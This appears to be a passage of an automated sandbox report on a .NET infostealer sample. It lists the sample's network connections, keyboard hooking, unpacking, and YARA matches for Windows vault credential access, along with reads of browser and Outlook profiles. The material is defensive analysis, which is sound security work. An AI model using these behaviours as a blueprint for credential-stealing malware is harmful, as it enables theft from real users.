Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49757 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 0V85.cs	.Net Code: j6bRr
Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, 0V85.cs	.Net Code: j6bRr

Installs a global keyboard hook

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 0_2_0172D364	0_2_0172D364
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 0_2_02F13180	0_2_02F13180
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 0_2_054ABF68	0_2_054ABF68
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 0_2_054AEAEE	0_2_054AEAEE
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_0176A768	3_2_0176A768
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_01764A70	3_2_01764A70
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_0176EC68	3_2_0176EC68
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_0176AF30	3_2_0176AF30
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_01763E58	3_2_01763E58
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_017641A0	3_2_017641A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_01761978	3_2_01761978
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CB0E0C	3_2_06CB0E0C
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CB22DB	3_2_06CB22DB
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CB22E8	3_2_06CB22E8
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CB2FDE	3_2_06CB2FDE
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC66F0	3_2_06CC66F0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC7E88	3_2_06CC7E88
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CCC690	3_2_06CCC690
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC56A0	3_2_06CC56A0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC2758	3_2_06CC2758
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CCB338	3_2_06CCB338
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC77A8	3_2_06CC77A8
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC5DF8	3_2_06CC5DF8
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CCE8A8	3_2_06CCE8A8
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC0040	3_2_06CC0040
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CC0007	3_2_06CC0007

Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2193630117.000000000129E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea02ac7d2-6de8-49b2-97cf-664fd36726ae.exe4 vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194259387.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194259387.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea02ac7d2-6de8-49b2-97cf-664fd36726ae.exe4 vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2197165841.0000000007C80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4573204072.00000000012D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4572800662.00000000010F8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea02ac7d2-6de8-49b2-97cf-664fd36726ae.exe4 vs LisectAVT_2403002A_127.exe
Source: LisectAVT_2403002A_127.exe	Binary or memory string: OriginalFilenamegpjZ.exe4 vs LisectAVT_2403002A_127.exe

Source: LisectAVT_2403002A_127.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: LisectAVT_2403002A_127.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 4Cl.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 4Cl.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 5jodGRGeKF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 5jodGRGeKF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, klmAZ8HTeMLVuJRsAH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, klmAZ8HTeMLVuJRsAH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	Security API names: _0020.SetAccessControl
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	Security API names: _0020.SetAccessControl
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/2

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LisectAVT_2403002A_127.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Mutant created: \Sessions\1\BaseNamedObjects\EfPTHAvKN

Source: LisectAVT_2403002A_127.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: LisectAVT_2403002A_127.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: LisectAVT_2403002A_127.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: LisectAVT_2403002A_127.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: LisectAVT_2403002A_127.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: gpjZ.pdb source: LisectAVT_2403002A_127.exe
Source:	Binary string: gpjZ.pdbSHA256 source: LisectAVT_2403002A_127.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	.Net Code: dJk7eGtM8T System.Reflection.Assembly.Load(byte[])
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	.Net Code: dJk7eGtM8T System.Reflection.Assembly.Load(byte[])
Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs	.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, wehuuoKhMKMbnQu72K.cs	.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])

Source: LisectAVT_2403002A_127.exe

Static PE information: 0xC63BD28A [Thu May 23 03:54:50 2075 UTC]

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 0_2_0172F4F8 pushfd ; iretd	0_2_0172F4F9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CB2C61 push 3006DAC9h; iretd	3_2_06CB2C6D
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Code function: 3_2_06CBBB80 push es; ret	3_2_06CBBB90

Source: LisectAVT_2403002A_127.exe

Static PE information: section name: .text entropy: 7.915103665911927

